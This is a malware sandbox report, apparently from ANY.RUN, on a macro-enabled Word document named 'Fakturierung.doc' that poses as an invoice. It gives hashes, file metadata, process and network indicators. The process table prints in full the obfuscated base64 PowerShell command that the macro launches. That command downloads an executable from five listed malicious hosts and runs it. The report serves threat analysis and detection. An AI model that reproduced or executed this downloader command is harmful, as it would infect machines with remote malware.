analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

Fakturierung

Full analysis: https://app.any.run/tasks/eef96dc7-dddb-4194-bb10-6503b7542ec8
Verdict: Malicious activity
Analysis date: February 18, 2019, 12:29:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Feb 18 08:21:00 2019, Last Saved Time/Date: Mon Feb 18 08:21:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 9, Security: 0
MD5:

42C70DF8E99664B7064CA58D0A01B9F8

SHA1:

127C6532B3684FACFC13420B196EAF349086E235

SHA256:

D838F3722647CF9A8729CE91A19B10DDF0DB61DA173593E75FE8E6D8EDA7EF55

SSDEEP:

6144:zG5/BnVfRFJ7KK9aHScdX9znGU431T/e7HJ8biTTCXhcKBMB:z2n9R/lA5dX9znGU2C7p8biaxcKBMB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Creates files in the user directory

      • poWersheLl.exe (PID: 2416)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3040)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3040)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 9
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 9
Words: 1
Pages: 1
ModifyDate: 2019:02:18 08:21:00
CreateDate: 2019:02:18 08:21:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
2
Malicious processes
0
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3040"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Fakturierung.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2416poWersheLl -e JABGADIAXwBfAF8AMgA9ACgAJwB1ADcANgAnACsAJwA4ACcAKwAnADcANgAnACkAOwAkAGgAXwBfAF8ANQA4ADIANAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABWADYAXwBfADUAMAAyAD0AKAAnAGgAdAB0ACcAKwAnAHAAOgAvAC8AbQAnACsAJwBhAHMAagBpAGQAJwArACcAcwBvAGwAJwArACcAYQByACcAKwAnAC4AbgBsAC8AeABNAFAAbgA2ACcAKwAnAFAANABTAFcAYwBfACcAKwAnAE4AbwByADQAJwArACcAagBqAGoAQgBnACcAKwAnAEAAaAB0AHQAcAAnACsAJwA6AC8ALwAnACsAJwB6AG8AJwArACcAbABvAHQAJwArACcAbwB5ACcAKwAnAGsAbAB1ACcAKwAnAGMAJwArACcAaAA2ADkALgAnACsAJwByAHUALwBiAHoAZABEAEoAJwArACcAaABzAFoAUABAAGgAJwArACcAdAB0AHAAOgAvACcAKwAnAC8AbQAnACsAJwBhAHMAawAnACsAJwAuAHMAJwArACcAdAB1AGQAaQBvAC8ASwB2ACcAKwAnADAAeQB4ACcAKwAnAGsAJwArACcAeQBRACcAKwAnADMANABAAGgAdAB0AHAAJwArACcAOgAvAC8AJwArACcAcwBhAGwAZQBzAHcAbwByAGsALgAnACsAJwBuACcAKwAnAGwALwBIACcAKwAnAGIANAA4AGEAJwArACcASAB5ACcAKwAnADkAVgBuAEEAeQA4AEAAaAAnACsAJwB0AHQAcAA6AC8ALwBjAGwAYQBzAGgAbwBmAGMAJwArACcAbAAnACsAJwBhAG4AJwArACcAcwAnACsAJwBnAGUAJwArACcAbQBzACcAKwAnAC4AJwArACcAbgBsACcAKwAnAC8AdwBlADAAdgAnACsAJwB6AGcAJwArACcAUgAnACsAJwBWAHIAQgBoAHQAXwBuADAAbQBzAGkAWgBYAEoAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQASgBfAF8AMwA3ADUAXwA1AD0AKAAnAGkAJwArACcANwAzADUAOABfACcAKQA7ACQAdwA2AF8AMwA0ADgAXwA3ACAAPQAgACgAJwA1ADQAJwArACcAMAAnACkAOwAkAGsAMQA2ADcANQBfADIAPQAoACcAVgAnACsAJwA2AF8AOQBfADcAJwApADsAJAByAF8AMwA3ADcAXwA1AF8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAHcANgBfADMANAA4AF8ANwArACgAJwAuACcAKwAnAGUAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAGMAMAA3AF8ANQA2AF8AIABpAG4AIAAkAFYANgBfAF8ANQAwADIAKQB7AHQAcgB5AHsAJABoAF8AXwBfADUAOAAyADQALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAYwAwADcAXwA1ADYAXwAsACAAJAByAF8AMwA3ADcAXwA1AF8AKQA7ACQAYwAyAF8AXwAzADkAMwBfAD0AKAAnAEIAOABfADgAJwArACcAXwBfAF8AJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAcgBfADMANwA3AF8ANQBfACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAcgBfADMANwA3AF8ANQBfADsAJABvADcAOQA2ADUANAA5AF8APQAoACcAQQAwAF8AJwArACcAXwAnACsAJwBfADUAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHIANwA3ADQAXwBfADUAMgA9ACgAJwB0ADYAMwAnACsAJwBfADEAMAA5ACcAKQA7AA==C:\Windows\System32\WindowsPowerShell\v1.0\poWersheLl.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 194
Read events
793
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
4

Dropped files

PID
Process
Filename
Type
3040WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6EA9.tmp.cvr
MD5:
SHA256:
2416poWersheLl.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0MLZ8WZF6SV7C1QRKECW.temp
MD5:
SHA256:
2416poWersheLl.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2416poWersheLl.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247b6a.TMPbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
3040WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:D54EF75E542155A03DAEF5B6D413EEBB
SHA256:562D35F242B53183D0D079C1C1AD18E899707440C8E0659262664879D6B869B7
3040WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Fakturierung.doc.LNKlnk
MD5:EB1386338C27DC9D2B7FF2CF8A5FB463
SHA256:457F1A214AAAD6EBAADC8F27A9D115CCA01FF5032BDC85229B99B51303806AE7
3040WINWORD.EXEC:\Users\admin\Desktop\~$kturierung.docpgc
MD5:E7CD6B14BBFB3D351220E2B272F9DB92
SHA256:98CC7CFD53E35A9CFAA9071C3FE0468C2AE0DF73D2E007512C3F004CA04EB0CD
3040WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:F9CE6B54C8DB5887AC8C9686B7A0EEF5
SHA256:2D0F42375C4B55C9F513F972A772AA5AA5F067A04788906DF94299E5AA67BC5C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2416
poWersheLl.exe
GET
404
195.208.1.101:80
http://zolotoykluch69.ru/bzdDJhsZP
RU
xml
345 b
malicious
2416
poWersheLl.exe
GET
404
195.208.1.102:80
http://mask.studio/Kv0yxkyQ34
RU
xml
345 b
malicious
2416
poWersheLl.exe
GET
404
185.182.56.155:80
http://masjidsolar.nl/xMPn6P4SWc_Nor4jjjBg
NL
xml
345 b
malicious
2416
poWersheLl.exe
GET
404
185.182.57.28:80
http://saleswork.nl/Hb48aHy9VnAy8
NL
xml
345 b
malicious
2416
poWersheLl.exe
GET
404
185.182.56.159:80
http://clashofclansgems.nl/we0vzgRVrBht_n0msiZXJ
NL
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2416
poWersheLl.exe
195.208.1.102:80
mask.studio
Autonomous Non-commercial Organization Regional Network Information Center
RU
malicious
2416
poWersheLl.exe
185.182.56.155:80
masjidsolar.nl
Astralus B.V.
NL
malicious
2416
poWersheLl.exe
195.208.1.101:80
zolotoykluch69.ru
Autonomous Non-commercial Organization Regional Network Information Center
RU
malicious
2416
poWersheLl.exe
185.182.57.28:80
saleswork.nl
Astralus B.V.
NL
malicious
2416
poWersheLl.exe
185.182.56.159:80
clashofclansgems.nl
Astralus B.V.
NL
malicious

DNS requests

Domain
IP
Reputation
masjidsolar.nl
  • 185.182.56.155
malicious
zolotoykluch69.ru
  • 195.208.1.101
malicious
mask.studio
  • 195.208.1.102
malicious
saleswork.nl
  • 185.182.57.28
malicious
clashofclansgems.nl
  • 185.182.56.159
malicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Fakturierung